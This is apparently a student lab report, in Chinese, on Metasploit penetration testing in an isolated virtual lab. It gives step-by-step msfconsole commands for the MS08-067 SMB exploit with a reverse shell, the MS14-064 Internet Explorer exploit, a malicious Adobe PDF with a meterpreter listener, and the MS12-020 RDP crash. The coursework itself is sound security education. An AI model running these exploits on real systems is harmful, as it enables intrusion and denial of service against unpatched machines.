1. 程式人生 > 其它 >實驗六 Metasploit攻擊滲透實踐 20192422李俊潔

實驗六 Metasploit攻擊滲透實踐 20192422李俊潔

實驗六 Metasploit攻擊滲透實踐 20192422李俊潔

一.實驗過程

任務一 一個主動攻擊實踐

我選擇查詢並利用Ms08-067漏洞模組對內網主機進行滲透攻擊
攻擊機:Kali GNU/Linux
ip地址:192.168.56.107
靶機:Windows XP SP3 Chinese - Simplified (NX)  作業系統
ip地址:192.168.56.109

1.檢測連通性

2.xp設定

關閉防火牆。關閉自動更新

3.linux執行

msfconsole//進入msfconsole
search MS08-067//查詢模組
use exploit/windows/smb/ms08_067_netapi//選擇模組


set payload generic/shell_reverse_tcp//使用載荷
set lhost 192.168.56.107//攻擊機ip
set lport 4567//埠
set RHOSTS 192.168.56.109//靶機ip
最終配置如下

exploit//開始滲透

可見攻擊成功了

任務二 一個針對瀏覽器的攻擊

攻擊機:Kali GNU/Linux
ip地址:192.168.56.107
靶機:Windows XP SP3 Chinese - Simplified (NX)  作業系統
ip地址:192.168.56.104

1.linux執行

msfconsole
search exploit Microsoft Internet Explorer//查詢和Windows的IE瀏覽器相關的漏洞


選擇了2014年11月釋出的漏洞exploit/windows/browser/ms14_064_ole_code_execution

進行配置
use exploit/windows/browser/ms14_064_ole_code_execution
set LHOST 192.168.56.107//設定攻擊機ip
exploit

將生成的網址http://192.168.56.107:8080/RceGKvyM在靶機中開啟


成功獲取到shell,可見攻擊成功了

任務三 針對客戶端攻擊

選擇對Adobe的攻擊
攻擊機:Kali GNU/Linux
ip地址:192.168.56.107
靶機:Windows XP SP3 Chinese - Simplified (NX)  作業系統
ip地址:192.168.56.104

1.linux執行

msfconsole
search adobe//查詢Adobe漏洞

use windows/fileformat/adobe_cooltype_sing //使用漏洞
set payload windows/meterpreter/reverse_tcp //選擇攻擊載荷
set LHOST 192.168.56.107 //攻擊者地址
set FILENAME 20192422ljj.pdf //設定生成pdf檔案
exploit //攻擊

將生成的檔案放入靶機中(靶機需提前安全adobe)
Linux下:
back
use exploit/multi/handler //進入監聽模組
set payload windows/meterpreter/reverse_tcp //選擇攻擊載荷
set LHOST 192.168.81.129 //攻擊者地址
exploit


可以看出攻擊成功了

任務四 成功應用任何一個輔助模組

我選擇實現MS12-020(CVE-2012-0002)藍屏攻擊
攻擊機:Kali GNU/Linux
ip地址:192.168.56.107
靶機:Windows 2000
ip地址:192.168.56.108
msfconsole
search ms12-020 //搜尋漏洞
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set RHOST 192.168.56.108//靶機地址
exploit

可見靶機被藍屏了,攻擊成功

二.實驗中遇見的問題

1.關於任務一,我遲遲無法進行連線

解決方法:忽略了防火牆和自動更新問題,將其都關閉都,再重啟,即可成功連線,即攻擊成功

2.關於任務二,我嘗試使用不同的漏洞,但是僅2014年11月釋出的漏洞可以生成能夠連線的網址,其他漏洞要麼無法生成網址,要麼網址無法連線,即404

解決方法:使用2014的漏洞

三.實驗感想

通過本次實驗,我再次瞭解到了msfconsole的強大功能,同時對於msfconsole自帶的輔助軟體也有了一些瞭解。雖然前幾次實驗也使用過msfconsole,但是這次實驗讓我係統地瞭解了它的六大模組,可謂是受益匪淺。
感謝老師的指導,同學們的幫助,期待下一次的實驗。